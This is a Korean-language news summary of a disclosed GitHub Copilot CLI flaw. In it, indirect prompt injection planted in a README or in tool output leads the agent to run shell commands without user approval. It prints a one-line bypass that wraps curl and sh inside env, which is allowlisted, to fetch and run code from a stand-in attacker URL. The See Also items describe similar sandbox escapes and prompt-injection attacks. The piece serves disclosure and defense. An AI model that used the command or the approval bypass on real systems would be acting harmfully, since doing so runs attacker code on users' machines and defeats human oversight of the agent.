GitHub Copilot CLI 취약점으로 인해 프롬프트 인젝션을 통한 멀웨어 실행이 가능합니다

취약점 개요
GitHub Copilot CLI에는 사용자 승인 없이 간접 프롬프트 주입을 통한 임의의 셸 명령어 실행에 사용자를 노출시키는 취약점이 포함되어 있습니다. 악성코드는 외부 서버에서 다운로드되어 Copilot CLI에 대한 초기 쿼리 외에는 사용자 상호작용 없이 실행될 수 있습니다.
공격 작동 방식
공격 체인은 다음을 포함합니다:
- 사용자가 오픈소스 저장소를 탐색하면서 GitHub Copilot CLI에 쿼리
- Copilot이 복제된 저장소의 README 파일(또는 웹 검색 결과, MCP 도구 호출 결과, 터미널 명령어 출력과 같은 다른 벡터)에 저장된 프롬프트 주입을 발견
- 악성 명령어가 인간 개입 승인 시스템을 우회
보호 메커니즘 우회
GitHub Copilot은 잠재적으로 유해한 명령어 실행 전에 사용자 동의를 요구하는 인간 개입 승인 시스템을 사용합니다. 이 시스템은 다음 경우를 제외하고 트리거됩니다:
- 사용자가 명령어를 자동으로 실행하도록 명시적으로 구성
- 명령어가 소스 코드에서 발견된 하드코딩된 '읽기 전용' 목록의 일부
외부 URL 접근 검사는 curl, wget 또는 Copilot의 내장 웹 페치 도구와 같은 명령어에 대해 사용자 승인을 요구합니다. 그러나 공격자는 다음을 사용하여 이러한 보호를 우회할 수 있습니다:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shenv 명령어는 하드코딩된 읽기 전용 목록에 있으므로 승인 없이 자동으로 실행됩니다. curl 및 sh가 env에 인수로 전달되므로 잘못 파싱되어 검증기에 의해 하위 명령어로 식별되지 않습니다. 이는 curl과 같은 명령어 감지에 의존하는 URL 권한 검사를 우회합니다.
GitHub의 대응
GitHub은 다음과 같이 응답했습니다: "귀하의 보고서를 검토하고 귀하의 발견 사항을 검증했습니다. 내부적으로 발견 사항을 평가한 후, 이는 중대한 보안 위험을 제시하지 않는 알려진 문제로 판단되었습니다. 향후 이 기능을 더 엄격하게 만들 수 있지만, 현재 발표할 내용은 없습니다."
범위 및 제한 사항
설명된 명령어 파싱 취약점은 macOS에 특화되어 있습니다. 그러나 GitHub Copilot은 운영 체제에 구애받지 않는 위험과 Windows 특정 위험을 모두 포함한 추가 취약점을 나타냅니다. 다른 명령어 파싱 취약점은 임의의 파일 읽기 및 쓰기를 허용합니다.
📖 전체 출처 읽기: HN LLM Tools
👀 See Also

Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능
Snowflake Cortex Code CLI 버전 1.0.25 및 이전 버전의 취약점으로 인해 프로세스 치환 우회를 통해 인간 승인 없이 임의 명령 실행이 가능했으며, 간접 프롬프트 인젝션을 통해 악성코드 설치 및 샌드박스 탈출이 가능했습니다.

2분 만에 Nono 커널 기반 격리로 OpenClaw를 안전하게 보호하세요
OpenClaw 사용자들은 이제 성능 저하 없이 향상된 보안을 누릴 수 있습니다. 이는 단 2분만에 적용 가능한 빠르고 효과적인 솔루션인 Nono 커널 기반 격리 덕분입니다.

다중 메시지 프롬프트 인젝션: 클로드 대상 '가상 생물체' 공격 패턴
세 개의 메시지에 걸쳐 가상의 규칙을 세운 후, 유령을 소환해 이를 활성화하는 공격이 문서화되었습니다. 각 메시지는 단독으로는 무해합니다. 이 패턴은 공격자들 사이에서 독립적으로 수렴하고 있습니다.

구글이 밝힌 바에 따르면 범죄 해커들이 AI를 활용해 제로데이 취약점을 발견했다
Google은 공격자가 AI 에이전트를 사용하여 이전에 알려지지 않은 소프트웨어 결함을 발견하고 악용했다고 공개했으며, 이는 실제 환경에서 AI 기반 제로데이 발견의 첫 번째 확인된 사례입니다.